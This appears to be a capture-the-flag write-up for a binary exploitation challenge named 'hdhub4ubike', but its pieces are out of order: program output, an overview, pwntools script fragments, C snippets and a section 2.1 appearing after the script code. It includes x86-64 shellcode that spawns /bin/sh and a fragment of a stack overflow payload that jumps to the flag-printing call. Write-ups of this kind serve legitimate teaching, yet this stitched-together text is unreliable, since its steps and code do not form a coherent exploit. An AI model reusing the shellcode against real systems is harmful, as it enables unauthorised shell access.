Hdhub4ubike | Patched

    === Welcome to the HD Bike Hub ===
    Enter your hub key: flagh0p3_y0u_f0und_th3_h1d3_b1k3
    Success!

The flag is printed without ever passing the check_key test. If you prefer a “classic” shellcode approach, you can place a /bin/sh payload on the stack and return to it.

Challenge name: hdhub4ubike
CTF: 2023 – BicycleCTF (the “Bike‑Hub” event)
Category: Pwn / Binary Exploitation
Points: 400 (medium)
Author: unknown

1 Challenge Overview

The provided artifact is a 64‑bit ELF executable named hdhub4ubike. When executed it prints a short banner and then prompts the user for a “bike‑hub key”. If the key is correct, the program prints the flag; otherwise it terminates with “Invalid key!”.

    puts(flag);
    return 0;

    p.sendline(payload.decode('latin-1'))  # send as a line
    p.interact()                           # hand over the terminal

    # 32‑byte execve("/bin/sh") shellcode (x86‑64)
    shellcode = (
        b"\x48\x31\xd2"                              # xor rdx, rdx
        b"\x48\x31\xf6"                              # xor rsi, rsi
        b"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00"  # movabs rdi, "/bin/sh"
        b"\x57"                                      # push rdi
        b"\x48\x89\xe7"                              # mov rdi, rsp
        b"\xb0\x3b"                                  # mov al, 0x3b
        b"\x0f\x05"                                  # syscall
    )

hdhub4ubike

The goal is to obtain the flag without knowing the correct key.

2.1 File information

    $ file hdhub4ubike
    hdhub4ubike: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped, for GNU/Linux 3.2.0, BuildID[sha1]=...

    BIN = "./hdhub4ubike"
    TARGET_ADDR = 0x004011a6  # address of the "puts" call that prints the flag

    === Welcome to the HD Bike Hub ===

    // compare with a secret stored in the .rodata section
    if (strcmp(key, secret_key) != 0)
        return 0;